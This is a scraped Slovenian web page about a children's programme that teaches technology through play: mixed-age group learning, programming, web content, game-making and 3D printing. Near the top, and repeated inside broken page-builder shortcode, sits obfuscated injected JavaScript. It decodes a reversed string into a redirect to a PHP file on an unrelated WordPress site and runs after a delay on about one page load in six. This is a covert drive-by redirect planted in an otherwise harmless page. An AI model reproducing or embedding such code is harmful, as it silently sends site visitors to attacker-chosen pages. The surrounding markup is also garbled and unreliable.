Select Page
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” make_equal=”off” use_custom_gutter=”off” fullwidth=”off” specialty=”off” disabled=”off”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” use_custom_gutter=”off” gutter_width=”3″ padding_mobile=”off” allow_player_pause=”off” parallax=”off” parallax_method=”on” make_equal=”off” column_padding_mobile=”on” parallax_1=”off” parallax_method_1=”on” parallax_2=”off” parallax_method_2=”on” parallax_3=”off” parallax_method_3=”on” parallax_4=”off” parallax_method_4=”on” disabled=”off”]

Igrivo učenje tehnologij

 

Igrivo učenje tehnologijNove tehnologije, telefoni, računalniki, igrice itd., so otrokom privlačne in radi se z njimi igrajo. Te motivacije za tehnologije in igro nočemo spremeniti. Hočemo jo le omejiti in voditi v pravo smer ter tako narediti za otroka bolj koristno in za starše bolj smiselno.

Iz pasivnih potrošnikov delamo aktivne ustvarjalce. Otroke vodimo od igre z novo tehnologijo v igro, ki ustvarja novo tehnologijo. Od igre z že narejeno igračo jih vodimo v igro, s katero naredili svojo igračo.

Učimo se v skupinah različno starih otrok. Mlajši otroci prejemajo od starejših tehnično in drugo pomoč, starejši pa od mlajših potrditev v obliki navdušenja nad njihovimi dosežki (»Uau, kaj zna!«). To se imenuje socialno učenje in krepi otrokove socialne kompetence, ki se sicer najbolje razvijajo skozi prosto igro.

Delo oz. izdelovalni projekti v skupini se prilagajajo interesom/željam in sposobnostim vključenih otrok. To velja predvsem za zaporedje projektov (s čim začnemo), medtem ko se v vseh skupinah otroci učijo naše štiri osnovne spretnosti: programirati, ustvarjati spletne vsebine, izdelovati igrice in 3D tiskati.